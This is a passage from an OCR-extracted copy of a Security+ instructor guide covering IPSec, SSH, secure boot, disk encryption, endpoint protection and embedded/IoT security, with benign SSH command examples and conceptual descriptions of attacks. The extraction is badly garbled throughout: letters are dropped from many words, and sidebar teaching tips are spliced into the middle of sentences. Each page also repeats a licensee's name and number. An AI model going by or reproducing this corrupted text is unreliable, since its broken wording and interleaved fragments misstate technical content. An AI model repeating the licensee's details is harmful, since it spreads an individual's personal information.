ach host that uses I ec must be assigned a policy. An I ec policy sets the
authentication mechanism and also the protocols and mode for the connection. osts
must be able to match at least one matching security method for a connection to
be established. There are two core protocols in I ec, which can be applied singly or
together, depending on the policy.
IPSec datagram using A The integrity of the payload and IP header is ensured by the
Integrity Check alue (IC ), but the payload is not encrypted.
IPSec datagram using ESP The TCP header and payload from the original packet are
encapsulated within ESP and encrypted to provide confidentiality.
ith ESP, algorithms for both confidentiality (symmetric cipher) and authentication integrity
(hash function) are usually applied together. It is possible to use one or the other, however.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
306 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Configuring an IPSec tunnel with ESP encryption in the pfSense security appliance.
(Screenshot used with permission from ubicon Communications, C.)
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 307
The principles underlying IPSec are the same for IPv and IPv6, but the header formats
are different. IPSec makes use of extension headers in IPv6 while in IPv , ESP and A are
allocated new IP protocol numbers ( 0 and 1), and either modify the original IP header or
encapsulate the original packet, depending on whether transport or tunnel mode is used.
I ec's encryption and hashing functions depend on a shared secret. The secret Internet ey change
must be communicated to both hosts and the hosts must confirm one another's
identity mutual authentication . therwise, the connection is vulnerable to man in Teaching
the middle and spoofing attacks. The Internet Key Exchange (IKE) protocol handles Tip
authentication and key e change, referred to as ecurity Associations A . plain how I
provides a connection
and authentication
mechanism for I ec.
2. hase II uses the secure channel created in hase to establish which ciphers
and key si es will be used with A and or in the I ec session.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
308 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 309
• Full tunnel Internet access is mediated by the corporate network, which will alter
the client's I address and DN servers and may use a pro y.
ull tunnel o ers better security, but the network address translations and DN
operations re uired may cause problems with some websites, especially cloud
services. It also means more data is channeled over the link.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
310 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Jump Servers
ne of the challenges of managing hosts that are e posed to the Internet, such as in
a DM or cloud virtual network, is to provide administrative access to the servers and
appliances located within it. n the one hand, a link is necessary on the other, the
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 311
Show Slide(s)
ecure hell
Teaching
Tip
is primarily for
Securing management traffic using a ump server. NI Linu , though
there are Windows
versions. Windows
can also use the
proprietary indows
Secure Shell emote Management
in M and indows
Secure Shell (SSH) is the principal means of obtaining secure remote access to a emote hell in .
command line terminal. The main uses of are for remote administration and Make sure students
secure file transfer T . There are numerous commercial and open source understand the
products available for all the ma or N platforms. The most widely used is pen di erence between
openssh.com . identifying a server
via its host key, and
servers are identified by a public private key pair the host key . A mapping of host connecting to the
names to public keys can be kept manually by each client or there are various server using a client
enterprise software products designed for host key management. public key.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
312 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
The host key must be changed if any compromise of the host is suspected. If an attacker has
obtained the private key of a server or appliance, they can mas uerade as that server or
appliance and perform a man-in-the-middle attack, usually with a view to obtaining other
network credentials.
The server's host key is used to set up a secure channel to use for the client to submit
authentication credentials.
• ublic key authentication each remote user's public key is added to a list of keys
authori ed for each local account on the server.
• erberos the client submits the erberos credentials a Ticket ranting Ticket
obtained when the user logged onto the workstation to the server using A I
eneric ecurity ervices Application rogram Interface . The server contacts
the Ticket ranting ervice in a indows environment, this will be a domain
controller to validate the credential.
anaging valid client public keys is a critical security task. any recent attacks on web
servers have exploited poor key management. If a user s private key is compromised, delete
the public key from the appliance then regenerate the key pair on the user s (remediated)
client device and copy the public key to the SS server. Always delete public keys if the user s
access permissions have been revoked.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 313
SSH Commands
commands are used to connect to hosts and set up authentication methods. To
connect to an server at . . . using an account named bobby and password
authentication, run
ssh [email protected]
The following commands create a new key pair and copy it to an account on the
remote server
ssh-keygen -t rsa
ssh-copy-id [email protected]
At an prompt, you can now use the standard Linu shell commands. se exit to
close the connection.
ou can also use the scp command to copy a file from the remote server to the
local host
scp [email protected]:/logs/audit.log audit.log
everse the arguments to copy a file from the local host to the remote server. To copy
the contents of a directory and any subdirectories recursively , use the -r option.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
314 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Review Activity:
Secure emote Access rotocols
Answer the following uestions
1. True or false? A TLS VPN can only provide access to web-based network
resources.
Transport mode with ncapsulating ecurity ayload . Tunnel mode encrypts the
I header information, but this is unnecessary on a private network. Authentication
eader A provides message authentication and integrity but not confidentiality.
ather than ust providing mutual authentication of the host endpoints, I v supports
a user account authentication method, such as tensible Authentication rotocol
A .
The server's public key host key . Note that this can only be trusted if the client trusts
that the public key is valid. The client might confirm this manually or using a Certificate
Authority.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 315
Lesson 11
Summary
ou should be able to configure secure protocols for local network access and Teaching
management, application services, and remote access and management. Tip
Check that students
Guidelines for Implementing Secure Network Protocols are confident about
the content that has
been covered. If there
ollow these guidelines when you implement or reconfigure network protocols is time, re visit any
• nsure availability for critical network address allocation D C , name resolution content e amples that
they have uestions
DN , directory access LDA , and time synchroni ation NT services. Monitor the
about. If you have
network to detect and remove rogue services. used all the available
time for this lesson
• Consider using NM for monitoring service availability. block, note the issues,
and schedule time for
• Assess the re uirements for securing an application protocol, such as certificates or a review later in the
shared keys for authentication and TC D port usage. nsure secure distribution course.
of credentials and create configuration documentation for secure usage.
• Deploy certificates or shared keys to N gateways and clients for use with TL
Ns, I ec, and L T I ec.
• Implement A s and out of band network interfaces or ump servers for secure
remote management of servers and network infrastructure.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
Lesson 12
Implementing Host Security Solutions
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
318 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Topic 12A
Implement Secure Firmware
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 319
Show Slide(s)
Configuring a Trusted Platform odule using system setup on an P workstation. oot Integrity
(Screenshot used with permission from P.)
Teaching
Tip
The problem with establishing a hardware root of trust is that devices are used in
e assume that
environments where anyone can get complete control over them. There cannot be students know what
complete assurance that the firmware underpinning the hardware root of trust is I is from A . If not,
inviolable, but attacks against trusted modules are sufficiently difficult so as to provide consider e plaining
e ective security in most cases. the di erence
between I and
I, though I
Boot Integrity motherboards are
increasingly scarce.
Most Cs and smartphones implement the unified e tensi le firm are inter ace plain how I
(UEFI). I provides code that allows the host to boot to an . I can enforce a is accessed and
number of boot integrity checks. configured.
Make sure students
Secure Boot can distinguish secure
boot from measured
Secure boot is designed to prevent a computer from being hi acked by a malicious . boot. ecure boot is
about provisioning
I is configured with digital certificates from valid vendors. The system firmware certificates for trusted
checks the operating system boot loader and kernel using the stored certificate to operating systems and
ensure that it has been digitally signed by the vendor. This prevents a boot loader blocking unauthori ed
or kernel that has been changed by malware or an installed without authori ation es. Measured
from being used. ecure boot is supported on indows docs.microsoft.com en us boot stores and
compares hashes of
windows security information protection secure the windows boot process and
critical boot files to
many Linu platforms wiki.ubuntu.com I ecure oot . ecure boot re uires I, detect unauthori ed
but does not re uire a T M. processes.
Attestation is the
Measured Boot process of sending
a signed boot log or
A trusted or measured boot process uses platform configuration registers C s report to a remote
in the T M at each stage in the boot process to check whether hashes of key system server.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
320 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
state data boot firmware, boot loader, kernel, and critical drivers have changed.
This does not usually prevent boot, but it will record the presence of unsigned kernel
level code.
Boot Attestation
Boot attestation is the capability to transmit a boot log report signed by the T M via a
trusted process to a remote server, such as a network access control server. The boot
log can be analy ed for signs of compromise, such as the presence of unsigned drivers.
The host can be prevented from accessing the network if it does not meet the re uired
health policy or if no attestation report is received.
Show Slide(s)
Disk ncryption
Teaching
Tip
pal is comple , with
di erent options
for consumer and
enterprise grades.
tudents can refer to
the white paper and
TC slides for more
detail. This should
not be re uired Configuring secure boot settings via an P workstation s UE I firmware setup program.
for the e am, but if (Screenshot used with permission from P.)
you want to give an
overview, note that
enterprise grades
support multiple
locking ranges that Disk Encryption
can be associated with
di erent D s and Full disk encryption (FDE) means that the entire contents of the drive or volume ,
users. There is also a including system files and folders, are encrypted. ACL based security measures
parallel specification are uite simple to circumvent if an adversary can attach the drive to a di erent host
TC torage ecurity . Drive encryption allays this security concern by making the contents of the drive
ubsystem Class accessible only in combination with the correct encryption key. Disk encryption can be
nterprise aimed at
C I A devices. applied to both hard disk drives DDs and solid state drives Ds .
Note that D is one D re uires the secure storage of the key used to encrypt the drive contents.
of the best methods Normally, this is stored in a T M. The T M chip has a secure storage area that a disk
of media saniti ation, encryption program, such as indows itLocker, can write its keys to. It is also possible
via the Crypto rase
function. e'll discuss
to use a removable drive if is a boot device option . As part of the setup
saniti ation at the end process, you create a recovery password or key. This can be used if the disk is moved
of the course. to another computer or the T M is damaged.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 321
Activating it ocker drive encryption. (Screenshot used with permission from icrosoft.)
As configuring passwords on individual drives is a huge challenge when more than a few
machines are involved, enterprises may use the ey anagement Interoperability Protocol
( IP) along with a hardware security module ( S ) to automate the provisioning of
keys (trustedcomputinggroup.org wp-content uploads S G TCG Enterprise-Introduction
Sept2010.pdf).
As revealed by researcher arsten Nohl in his ad paper srlabs.de wp content and lash Drive
uploads Labs ad lack at v .pdf , e ploiting the firmware of e ternal ecurity
storage devices, such as ash drives and potentially any other type of firmware ,
presents adversaries with an incredible toolkit. The firmware can be reprogrammed Teaching
to make the device look like another device class, such as a keyboard. In this case it Tip
could then be used to in ect a series of keystrokes upon an attachment or work as Make sure students
a keylogger. The device could also be programmed to act like a network device and understand the risks
corrupt name resolution, redirecting the user to malicious websites. from devices
and how to identify
Another e ample is the .M cable theverge.com apple mac indicators of attacks.
lightning cable hack mike grover mg omg cables defcon cybersecurity , which packs
enough processing capability into an ordinary looking Lightning cable to run an
access point and keylogger.
A modified device may have visual clues that distinguish it from a mass manufactured
thumb drive or cable, but these may be difficult to spot. ou should warn users of the
risks and repeat the advice to never attach devices of unknown provenance to their
computers and smartphones. If you suspect a device as an attack vector, observe a
sandbo ed lab system sometimes referred to as a sheep dip closely when attaching
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
322 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
the device. Look for command prompt windows or processes such as the command
interpreter starting and changes to the registry or other system files.
ot all attacks have to be so esoteric. US sticks infected with ordinary malware are still
incredibly prolific infection vectors. osts should always be configured to prevent autorun
when US devices are attached. US ports can be blocked altogether using most types of
Host Intrusion Detection Systems (HIDS).
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 323
It is also possible for both open source and commercial pro ects to be abandoned if a
company continues to rely on such abandonware, it will have to assume development
responsibility for it. There are many instances of applications and devices peripheral
devices especially that remain on sale with serious known vulnerabilities in firmware
or drivers and no prospect of vendor support for a fi . The problem is also noticeable
in consumer grade networking appliances and in the Internet of Things. hen
provisioning a supplier for applications and devices, it is vital to establish that they have
e ective security management lifecycles for their products.
It is important to remember that although one can outsource virtually any service or rgani ational
activity to a third party, one cannot outsource legal accountability for these services ecurity Agreements
or actions. ou are ultimately responsible for the services and actions that these third
parties take. If they have any access to your data or systems, any security breach in their Teaching
organi ation for e ample, unauthori ed data sharing is e ectively a breach in yours. Tip
Issues of security risk awareness, shared duties, and contractual responsibilities can be e don't try to
set out in a formal legal agreement. The following types of agreements are common go into any detail
here ust make sure
• Memorandum of understanding (MOU) A preliminary or e ploratory agreement students know the
to e press an intent to work together. M s are usually intended to be relatively basic purpose of each
informal and not to act as binding contracts. M s almost always have clauses agreement type.
stating that the parties shall respect confidentiality, however.
• Non disclosure agreement NDA Legal basis for protecting information assets.
NDAs are used between companies and employees, between companies and
contractors, and between two companies. If the employee or contractor breaks this
agreement and does share such information, they may face legal conse uences.
NDAs are useful because they deter employees and contractors from violating the
trust that an employer places in them.
• Service level agreement (SLA) A contractual agreement setting out the detailed
terms under which a service is provided.
A legal agreement is all very well, but it is still up to you to make sure that your
suppliers, vendors, and contractors can live up to it. If they can't, you may successfully
sue them, but if they go out of business, you are still accountable for their actions or
failures to act.
Conversely, you need to ensure that you can comply with the re uirements and
performance standards of any agreements that you enter into as a service provider.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
324 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Review Activity:
Secure Firmware
Answer the following uestions
2. h are en orced file access controls not su cient in the e ent o the
loss or theft of a computer or mobile device?
The disk or other storage could be attached to a foreign system and the administrator
could take ownership of the files. ile level, full disk encryption D , or self encrypting
drives D mitigate this by re uiring the presence of the user's decryption key to read
the data.
A trusted platform module provides a secure mechanism for creating and storing the
key used to encrypt the data. Access to the key is provided by configuring a password.
The alternative is usually to store the private key on a stick.
nly use reputable suppliers for peripheral devices and strictly controlled sources for
firmware updates. Consider use of a sheep dip sandbo ed system to observe a device
before allowing it to be attached to a host in the enterprise network. se e ecution
control software to allow only approved vendors.
A memorandum of understanding M .
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 325
Topic 12B
Implement Endpoint Security
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
326 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
It is also important to establish a maintenance cycle for each device and keep up to
date with new security threats and responses for the particular software products that
you are running.
Using Security Compliance anager to compare settings in a production GPO with icrosoft s
template policy settings. (Screenshot used with permission from icrosoft.)
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 327
be e ective at discovering missing patches for the operating system, plus a wide range Teaching
of third party software apps and devices firmware. canning is only useful if e ective Tip
procedures are in place to apply the missing patches, however. npatched client
n residential and small networks, hosts will be configured to auto update, meaning applications and web
application servers
that they check for and install patches automatically. The ma or and applications corrupting trusted
software products are well supported in terms of vendor supplied fi es for security websites through
issues. nterprise networks need to be cautious about this sort of automated the site owner's la
deployment, however, as a patch that is incompatible with an application or work ow security remain one
can cause availability issues. There can also be performance and management issues of the biggest security
issues at the current
when multiple applications run update clients on the same host. or e ample, as well
time uifa for
as the updater, there is likely to be a security software update, browser updater, instance, theregister.
Java updater, M driver updater, and so on. These issues can be mitigated by com
deploying an enterprise patch management suite. ome suites, such as Microsoft s missed patch caused
ystem Center Configuration Manager CCM ndpoint Manager docs.microsoft.com e uifa data breach .
en us mem configmgr , are vendor specific while others are designed to support third ecent years have
seen leaks of tools
party applications and multiple s.
developed by the CIA
It can also be difficult to schedule patch operations, especially if applying the patch and other intelligence
is an availability risk to a critical system. If vulnerability assessments are continually agencies to e ploit
vulnerabilities in
highlighting issues with missing patches, patch management procedures should indows and mobile
be upgraded. If the problem a ects certain hosts only, it could be an indicator of . This means that
compromise that should be investigated more closely. systems that are not
completely up to
atch management can also be difficult for legacy systems, proprietary systems, and date with patches are
systems from vendors without robust security management plans, such as some types e tremely high risk.
of Internet of Things devices. These systems will need compensating controls, or some
other form of risk mitigation if patches are not readily available.
Another crucial step in hardening is to configure endpoint protection for automatic ndpoint rotection
detection and prevention of malware threats. There have been many iterations of
host based endpoint protection suites and agents. It is important to consider the Teaching
contrasting functions performed, as individual software tools or protection suites often Tip
combine multiple functionality. tudents should
hopefully be
Antivirus (A-V)/Anti-Malware comfortable with
the features and
The first generation of anti virus A software is characteri ed by signature based operation of A
detection and prevention of known viruses. An A product will now perform scanners, so focus on
generali ed malware detection, meaning not ust viruses and worms, but also Tro ans, advanced malware
spyware, s, crypto ackers, and so on. hile A software remains important, detection techni ues.
signature based detection is widely recogni ed as being insufficient for the prevention Note that we'll cover
of data breaches. DL in more detail
later in the course.
Host-Based Intrusion Detection/Prevention (HIDS/HIPS) Interaction
Opportunity
ost based intrusion detection systems ID provide threat detection via log and
file system monitoring. ID come in many di erent forms with di erent capabilities, ptionally, get the
some of them preventative I . ile system integrity monitoring uses signatures to students to research
features of s on
detect whether a managed file image such as an system file, driver, or application di erent vendor sites.
e ecutable has changed. roducts may also monitor ports and network interfaces,
and process data and logs generated by specific applications, such as TT or T .
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
328 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
con icts, creating numerous technical support incidents and security incident false
positives. An endpoint protection platform is a single agent performing multiple
security tasks, including malware intrusion detection and prevention, but also other
security features, such as a host firewall, web content filtering secure search and
browsing, and file message encryption.
3. Test the di erent host group configuration settings to ensure that the e pected
range of threats is detected.
4. se a monitoring dashboard to verify status across all network hosts. Apart from
detection events, if the agent is disabled or missing, there should be an alert.
ote that managed detection and response ( ) is a class of hosted security service
(digitalguardian.com blog what-managed-detection-and-response-definition-benefits-how-
choose-vendor-and-more).
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 329
An on access anti virus scanner or intrusion prevention system works by identifying Antivirus esponse
when processes or scripts are e ecuted and intercepting or hooking the call to scan
the code first. If the code matches a signature of known malware or e hibits malware
like behavior that matches a heuristic profile, the scanner will prevent e ecution and
attempt to take the configured action on the host file clean, uarantine, erase, and so
on . An alert will be displayed to the user and the action will be logged and also may
generate an administrative alert . The malware will normally be tagged using a vendor
proprietary string and possibly by a CM Common Malware numeration identifier.
These identifiers can be used to research the symptoms of and methods used by
the malware. This may help to confirm the system is fully remediated and to identify
whether other systems have been infected. It is also important to trace the source of
the infection and ensure that it is blocked to prevent repeat attacks and outbreaks.
and o in
andbo ing is a techni ue that isolates an untrusted host or app in a segregated
environment to conduct tests. andbo environments intentionally limit interfaces with
the host environment. The analysis of files sent to a sandbo can include determining
whether the file is malicious, how it might have a ected certain systems if run outside
of the sandbo , and what dependencies it might have with e ternal files and hosts.
andbo es o er more than traditional anti malware solutions because you can apply
a variety of di erent environments to the sandbo instead of ust relying on how the
malware might e ist in your current configuration.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
330 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Review Activity:
Endpoint Security
Answer the following uestions
A basic principle of security is to run only services that are needed. A hardened
system is configured to perform a role as client or application server with the minimal
possible attack surface, in terms of interfaces, ports, services, storage, system registry
permissions, lack of security controls, and vulnerabilities.
alse any vendor's or open source software or firmware can contain vulnerabilities
that need patching.
The string identifying the malware. ou can use this to reference the malware on the
A vendor's site and, hopefully, obtain manual removal and prevention advice.
Advanced persistent threat A T malware can use many techni ues to evade
signature based detection. A cloud analytics platform, backed by machine learning, can
apply more e ective behavioral based monitoring and alerting.
ou can use a sandbo with monitoring tools to see which files the process interacts
with and a network monitor to see if it opens or tries to open a connection with a
remote host.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 331
Topic 12C
Explain Embedded System
Security Implications
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
332 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Implied trust means that every device that has been added to the network is trusted,
on the assumption that it was added and continues to be operated by a legitimate
administrator. ntil there is widespread adoption of embedded T M, embedded
networks have to rely on the perimeter security model.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 333
Cellular Networks
A cellular network enables long distance communication over the same system that
supports mobile and smartphones. This is also called baseband radio, after the
baseband processor that performs the function of a cellular modem. There are several
baseband radio technologies
• Narrowband IoT N IoT this refers to a low power version of the Long Term
volution LT or cellular standard. The signal occupies less bandwidth than
regular cellular. This means that data rates are limited kbps , but most
sensors need to send small packets with low latency, rather than making large data
transfers. Narrowband also has greater penetrating power, making it more suitable
for use in inaccessible locations, such as tunnels or deep within buildings, where
ordinary cellular connectivity would be impossible.
hile not yet completely standardi ed, both N IoT and LT M are designed to be
compatible with networks. This means they do not interfere with signaling and
can use tower relays developed for . They may support higher data rates, though
latency and reliability tend to be more important considerations.
Any LT based cellular radio uses a subscriber identity module (SIM) card as an
identifier. The IM is issued by a cellular provider, with roaming to allow use of other
suppliers' tower relays. As a removable card is not really a suitable form factor for
embedded, an e IM incorporates the same function as a chip on the system board or
oC design.
ncryption of frames between the endpoint and the cell tower and within the backhaul
to Internet routers is the responsibility of the network operator. ver the air encryption
is performed by encryption schemes devised by the cellular standards body .
ackhaul security is usually enforced using I ec. The embedded system can use
application layer encryption for additional security.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
334 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
data bandwidth at the e pense of range compared to ave and the greater risk of
interference from other . radio communications. igbee supports more overall
devices within a single network and there is no hop limit for communication between
devices.
oth ave and igbee have communications encryption. The main threats are from
re pairing attacks and from rogue devices. A re pairing attack allows a threat actor
to discover the network key by forcing a device o the network, causing it to try to
re connect checkpoint.com press the dark side of smart lighting check point
research shows how business and home networks can be hacked from a lightbulb . If
the user connects a rogue device to the network, the system depends on application
level security to prevent the device from compromising higher value targets, such as a
smart hub, alarm, or door entry mechanism.
ICS/SCADA Applications
These types of systems are used within many sectors of industry
• nergy refers to power generation and distribution. More widely, utilities includes
water sewage and transportation networks.
• Industrial can refer specifically to the process of mining and refining raw materials,
involving ha ardous high heat and pressure furnaces, presses, centrifuges, pumps,
and so on.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 335
systems, such as forges, mills, and assembly lines. These systems must work to
e tremely high precisions.
• Logistics refers to moving things from where they were made or assembled to
where they need to be, either within a factory or for distribution to customers.
mbedded technology is used in control of automated transport and lift systems
plus sensors for component tracking.
IC CADA was historically built without regard to IT security, though there is now high
awareness of the necessity of enforcing security controls to protect them, especially
when they operate in a networked environment.
One infamous example of an attack on an embedded system is the Stuxnet worm (wired.
com 01 11 countdown-to-zero-day-stuxnet). This was designed to attack the SCA A
management software running on indows PCs to damage the centrifuges used by Iran s
nuclear fuels program. IST Special Publication 00- covers some recommendations
for implementing security controls for ICS and SCA A (nvlpubs.nist.gov nistpubs
SpecialPublications IST.SP. 00- r .pdf).
The term Internet of Things (IoT) is used to describe a global network of appliances Internet of Things
and personal devices that have been e uipped with sensors, software, and network
connectivity. This compute functionality allows these ob ects to communicate and Teaching
pass data between themselves and other traditional systems like computer servers. Tip
This is often referred to as Machine to Machine M M communication. ach thing is ith Internet of
identified with some form of uni ue serial number or code embedded within its own Things and wearable
operating or control system and is able to inter operate within the e isting Internet technology, evaluation
infrastructure either directly or via an intermediary. An IoT network will generally use of the supply chain
the following types of components is critical. endors
and Ms must be
• ub control system IoT devices usually re uire a communications hub to facilitate assessed for their
ave or igbee networking. There must also be a control system, as most IoT security awareness.
devices are headless, meaning they have no user control interface. This could be a
smart hub, with voice control, or a smartphone C app.
• mart devices IoT endpoints implement the function, such as a smart lightbulb
or a video entryphone that you can operate remotely. These devices implement
compute, storage, and network functions that are all potentially vulnerable to
e ploits. Most smart devices use a Linu or Android kernel. ecause they're
e ectively running mini computers, smart devices are vulnerable to some of
the standard attacks associated with web applications and network functions.
Integrated peripherals such as cameras or microphones could be compromised to
facilitate surveillance.
• ensors IoT devices need to measure all kinds of things, including temperature,
light levels, humidity, pressure, pro imity, motion, gas chemicals smoke, heart
breathing rates, and so on. These are implemented as thermocouples thermistors,
infrared detectors, inductive, photoelectric, and capacitative cells, accelerometers,
gyroscopes, and more.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
336 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
ome automation products often use vendor specific software and networking
protocols. As with embedded devices, security features can be poorly documented, and
patch management security response processes of vendors can be inade uate. hen
they are designed for residential use, IoT devices can su er from weak defaults. They
may be configured to work with a minimum of configuration e ort. There may be
recommended steps to secure the device that the customer never takes.
• Code in ection via the graphical web application interfaces used to configure and
monitor systems. This can be used to perform Java cript based attacks, such as
click acking and cross site scripting .
It is possible that control of these systems could be used to perform some sort of
Do or ransom demand consider disrupting AC controls within a data center, for
instance . owever, as with the Target data breach, the aim is likely to access the
corporate data network from the automation and monitoring system, which may be
accessible via a supplier company krebsonsecurity.com tag fa io mechanical .
Smart Meters
A smart meter provides continually updating reports of electricity, gas, or water usage
to the supplier, reducing the need for manual inspections. Most meters use cellular
data for communication back to the supplier, and an IoT protocol, such as ig ee, for
integration with smart appliances.
Surveillance Systems
A physical access control system AC is a network of monitored locks, intruder
alarms, and video surveillance. A AC can either be implemented as part of a building
automation system or a separate system in its own right. aining physical access to
premises, or even ust access to video monitoring systems, gives an adversary many
opportunities to develop additional attacks. As with building automation, a AC is likely to
be installed and maintained by an e ternal supplier. This can lead to it being omitted from
risk and vulnerability assessments, as highlighted by the overnment Accountability
ffice's report into AC at federal offices gao.gov assets .pdf .
hysical security systems use networked camera systems CCT for surveillance.
nfortunately, some makes of camera systems have been found to have numerous
serious vulnerabilities that allow attackers either to prevent intrusions from being
recorded or to hi ack the cameras to perform their own surveillance. These issues
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 337
tend to a ect cheap consumer grade systems rather than enterprise models, but in
both cases it is necessary to evaluate the supplier to demonstrate that their security
monitoring and remediation support services are e ective.
There are also speciali ed systems installed within office networks, such as printer and peciali ed ystems
oice over I oI e uipment. These systems must not be overlooked by security in IT
monitoring procedures.
Teaching
Multifunction Printers (MFPs) Tip
Most modern print devices, scanners, and fa machines have hard drives and In , security
researchers hacked
sophisticated firmware, allowing their use without attachment to a computer and the web interface of a
over a network. ften these print scan fa functions are performed by single devices, Canon i ma printer
referred to as multifunction printers (MFPs). nless they have been securely deleted, and used the e ploit
images and documents are fre uently recoverable from all of these machines. ome of to install the s
the more feature rich, networked printers and M s can also be used as a pivot point first person shooter
game Doom on the
to attack the rest of the network. These machines also have their own firmware that
printer firmware
must be kept patched and updated. wired.com
doom printer .
Voice over IP (VoIP)
Types of embedded systems are used to implement both oice over I oI endpoints
and media gateways. ndpoints can be individual handsets or conferencing units.
A media gateway might use a separate firmware to implement integration with
telephone and cellular networks.
here these devices connect directly to the Internet, a fingerprinting app or website
(shodan.io/explore/tag/voip or shodan.io/explore/tag/printer, for instance) can be used to
probe for unpatched vulnerabilities. There are Shodan ueries for any number of IoT and
ICS devices.
Shodan search results for sites responding to probes over port 100 (TCP port for raw print data).
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
338 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
peciali ed ystems
for Medical Devices Specialized Systems for Medical Devices
Teaching
Medical devices represent an array of systems potentially vulnerable to a wide range
Tip
of attacks. It is important to recogni e that use of these devices is not confined
to hospitals and clinics but includes portable devices such as cardiac monitors
ou can reference
the recall of certain
defibrillators and insulin pumps. As well as unsecure communication protocols, many
types of pacemaker of the control systems for these devices run on unsupported versions of operating
csoonline.com article systems such as indows because the costs of updating the software to work
with newer versions is high and disruptive to patient services. ome of the goals of
abbott pacemakers attacks on medical devices and services are as follows
vulnerable to hacking
need a firmware fi . • se compromised devices to pivot to networks storing medical data with the aim of
html for a firmware stealing protected health information I.
update to fi a
vulnerability that could • old medical units ransom by threatening to disrupt services.
allow an attacker to
drain the device's • ill or in ure patients or threaten to do so by tampering with dosage levels or
battery. device settings.
Show Slide(s)
ecurit or m edded stems
ecurity for mbedded mbedded systems must not be overlooked when designing the security system. The
ystems following methods can be used to mitigate risk in such environments.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 339
Wrappers
ne way of increasing the security of data in transit for embedded systems is through the
use of wrappers, such as I ec. The only thing visible to an attacker or anyone sniffing
the wire is the I ec header, which describes only the tunnel endpoints. This is useful
for protecting traffic between trusted networks when the traffic has to go through an
untrusted network to go between them, or between trusted nodes on the same network.
• Many embedded systems re uire manual updates, which are perceived as too time
consuming for a security department with other priorities to perform.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
